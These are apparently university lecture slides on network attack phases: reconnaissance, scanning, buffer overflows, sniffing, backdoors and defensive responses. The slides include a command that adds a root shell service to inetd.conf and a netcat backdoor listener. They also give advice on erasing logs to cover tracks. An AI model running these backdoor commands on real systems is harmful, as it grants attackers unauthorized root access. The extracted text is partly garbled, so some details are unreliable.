COEN 350

Security Threats

Network Based Exploits

Phases of an Attack Reconnaissance Scanning Gaining Access Expanding Access Covering Tracks

Reconnaissance Social Engineering

“I cannot access my email. What do I do?” Dumpster Diving (especially useful when

people move) Search the Web

Sam Spade (www.samspade.org/ssw/), CyberKit, NetScanTools, ...

Search Engine Usenet postings Whois

ReconnaissanceDatabases To research .com , .net, and .org domain

names:InterNIC whois feature: www.internic.net/whois.html allwhois, network soultions, ...

ARIN: American Registry for Interent Numbers (www.arin.net/whoiis/arin-whois.html)

RIPE (Europe) www.ripe.net APNIC (Asia Pacific) www.apnic.net

ScanningOnce we have a target, we need to get to

know it better.Methods: War Dialing (to find out modem access) Network Mapping Vulnerability Scanning War Driving

Scanning: War DialingPurpose: Find a modem connection. Many users in a company install remote PC

software such as PCAnywhere without setting the software up correctly.

War Dialer finds these numbers by going through a range of phone numbers listening for a modem.

Demon Dialer tries a brute force password attack on a found connection.

Typically: war dialing will find an unsecured connection.

Scanning: Network MappingPing: ping is implemented using the Internet Control Message Protocol (ICMP) Echo Request.

A receiving station answers back to the sender.

Used by system administrators to check status of machines and connections.

Scanning: Network MappingTraceroute: Pings a system with ICMP echo requests

with varying life spans (= # of hops allowed).

A system that receives a package with expired numbers of hops sends an error message back to sender.

Traceroute uses this to find the route to a given system.

Useful for System Administration

Scanning: Network Mapping

Cheops:Network Scanner(UNIX based)

(Uses traceroute and other tools to map a network.)

Cheops et Co. are the reason that firewalls intercept pings.

Scanning: Port Scans Applications on a system use ports to

listen for network traffic or send it out. 216 ports available, some for known

services such as http (80), ftp, ... Port scans send various type of IP

packages to target on different ports. Reaction tells them whether the port is

open (an application listens).

Scanning: Nmap Uses different types of packets to check

for open ports. Can tell from the reaction what OS is

running, including patch levels. Can run in stealth mode, in which it is not

detected by many firewalls.

Gaining Access Gain access using application and OS

attacks. Gain access using network attack.

Gaining Access through Apps and OS Stack-Based Overflow AttacksStack is the area where function arguments

and return addresses are saved. Password Attacks Web Application Attacks

Stack Based AttacksIf a function is called, then the registers are

saved on the stack, followed by the arguments, followed by the return address. At the end of the function execution, the registers are restored from stack.

Stack Based AttackIf a function takes string arguments for

inputs and is poorly written, then a long string input leads to the stack to be unwound incorrectly.

As a consequence, some of the input ends up as register values.

You can use this to execute short code snippets.

Stack Based Attacks (How to do it?) Take a popular application, install it on

your machine, and see whether you can crash it by giving it long inputs.

If it does, use the debug function to find out what register values get loaded. Any debugger installed on your system will tell you.

Fine-tune the input to let you do something interesting

Ready to go and wreck havoc.

Buffer Attack Example On a Unix system, use a buffer overflow in

a network accessible program (running at root level) to execute:

/bin/sh –c “echo 12345 stream tcp nowait root /bin/sh sh –i” >> /etc/inetd.conf; killall –HUP inetd

This shell adds a network service at port 12345 that spawns a command shell with full privileges.

Web Application Attacks The URL not only contains the web

address of a site, but also input:http://www.google.com/search?hl=en&ie=UTF-8&oe=UTF-

8&q=web+application+attack

A poorly written webpage allows the viewer to input data in an uncontrolled fashion. If the webpage contains SQL, the user might execute SQL commands.

Gaining Access through Network Attacks:Sniffing Sniffer: Gathers traffic from a LAN. Examples: Snort www.snort.org, Sniffit

reptile.rug.ac.be/~coder/sniffit/sniffit.html To gain access to packages, use spoofed

ARP (Address Resolution Protocol) to reroute traffic.

Session Hijacking IP Address Spoofing: Send out IP packages

with false IP addresses. If an attacker sits on a link through which

traffic between two sites flows, the attacker can inject spoofed packages to “hijack the session”.

Details omitted.

Exploiting and Maintaining AddressAfter successful intrusion, an attacker

should: Use other tools to gain root or

administrator privileges. Erase traces (e.g. change log entries). Take measures to maintain access. Erase security holes so that no-one else

can gain illicit access and do something stupid to wake up the sys. ad.

Trojans A program with an additional, evil payload. E.g. Running MS Word also reinstalls a

backdoor.

Backdoors Bypass normal security measures.

Example: netcat Install netcat on victim with the

GAPING_SECURITY_HOLE option.C:\ nc -1 –p 12345 –e cmd.sh In the future: connect to port 12345 and

start typing commands.

Backdoors BO2K (Back Orifice 2000) runs in stealth

mode (you cannot discover it by looking at the processes tab in the TASK MANAGER.

Otherwise, it is a remote control program like pcAnyWhere, that allows accessing a computer over the net.

Backdoors RootKit:A backdoor built as a Trojan of system

executables such as ipconfig. Kernel-Level RootKit:Changes the OS, not only system

executables.

Responses Filter Internet Connections. Run Security Audits. (E.g. try to use

hacking tools to break into your own system.)

Backup all data and prepare for complete reinstall after an incident.

Log on write-only media. For commercial sites: Develop a

comprehensive security policy.